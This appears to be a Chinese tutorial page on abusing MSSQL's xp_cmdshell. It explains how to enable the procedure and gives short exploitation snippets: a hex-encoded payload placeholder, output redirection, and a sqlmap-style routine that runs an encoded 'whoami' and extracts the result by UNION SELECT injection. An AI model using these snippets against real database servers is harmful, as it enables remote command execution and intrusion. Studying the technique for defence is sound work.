MSSQL-xp_cmdshell 的利用
一.關於xp_cmdshell
xp_cmdshell是用於執行Windows命令的一個擴充套件儲存過程。
xp_cmdshell 生成的 Windows 程式與 SQL Server 服務帳戶具有相同的安全許可權。
自SQL Server 2000後,預設情況下,xp_cmdshell 選項在新安裝的軟體上處於禁用狀態,但是可以執行 sp_configure 系統儲存過程來啟用它。
二.xp_cmdshell的語法
xp_cmdshell { 'command_string' } [ , no_output ]
'command_string' 包含要傳遞到作業系統的命令字串。command_string 的資料型別為 varchar(8000) 或 nvarchar(4000),無預設值。command_string 不能包含一對以上的雙引號。如果 command_string 中引用的檔案路徑或程式名中存在空格,則需要使用一對引號。
no_output可選引數,指定不應向客戶端返回任何輸出。
三.啟用xp_cmdshell
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
四.xp_cmdshell的利用
1.將要執行的命令先進行十六進位制轉換然後儲存到變數中,最後再執行。
declare @shellcode varchar(600);set @shellcode=0x48inputyourpayload;exec master..xp_cmdshell @shellcode
2.將命令執行結果輸出到檔案中
DECLARE @cmd sysname, @var sysname
SET @var = 'dir/p'
SET @cmd = @var + ' > dir_out.txt'
EXEC master..xp_cmdshell @cmd
3.將命令執行結果輸出到臨時表中
CREATE TABLE sqlmapoutput(id INT PRIMARY KEY IDENTITY, data NVARCHAR(4000))
DECLARE @ugye VARCHAR(8000);SET @ugye=0x77686f616d69;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @ugye
union select null,null,data from sqlmapoutput where id = 1
DROP TABLE sqlmapoutput
相關文章
- Flask SSTI利用方式的探索Flask
- Oracle Partitioned Table:exchange的利用Oracle
- 高效利用佇列的空間佇列
- nmap的理解與利用(初級)
- 光線的利用和影調
- Metasploit profiling工具的利用
- 利用標籤完善你的網站網站
- RNN入門:利用TF的API(二)RNNAPI
- 利用 proxy 監視物件的變化物件
- 利用n和nvm管理Node的版本
- 利用WCF建立簡單的RESTFul ServiceREST
- 利用nsca監控oracle的session數OracleSession
- jni安全利用的簡單學習
- redis漏洞利用Redis
- ruoyi漏洞利用
- Tomcat的8009埠AJP的利用Tomcat
- Linux下的堆off-by-one的利用Linux
- 利用工廠類讀取資原始檔,利用反射建立出javabean的思路,請各位指教反射JavaBean
- STRUTS2的getClassLoader漏洞利用
- CRLF Injection漏洞的利用與例項分析
- 利用HTTP host頭攻擊的技術HTTP
- 如何利用MySQL有效的儲存IP地址MySql
- 利用RSA對前後端加密的探索後端加密
- 利用wordpress的資料庫操作函式資料庫函式
- 好好利用平臺的公開APIAPI
- 如何利用Scratch製作出好玩的遊戲?遊戲
- 如何利用LaTex的寫畢業論文
- 利用WordPress搭建屬於自己的網站網站
- 一種利用EXCEL的BazarLoader攻擊Excel
- 利用sklearn進行字典&文字的特徵提取特徵
- ctf pwn中的unlink exploit(堆利用)
- 利用 DB 實現分散式鎖的思路分散式
- 快速利用RecyclerView的LayoutManager搭建流式佈局View
- 利用js解析php的表單資料JSPHP
- 基於 GDI 物件的 Windows 核心漏洞利用物件Windows
- 利用Mathemtaica軟體求數列的和AI
- 利用iframe引入外部網站的功能模組網站
- 利用備份的控制檔案恢復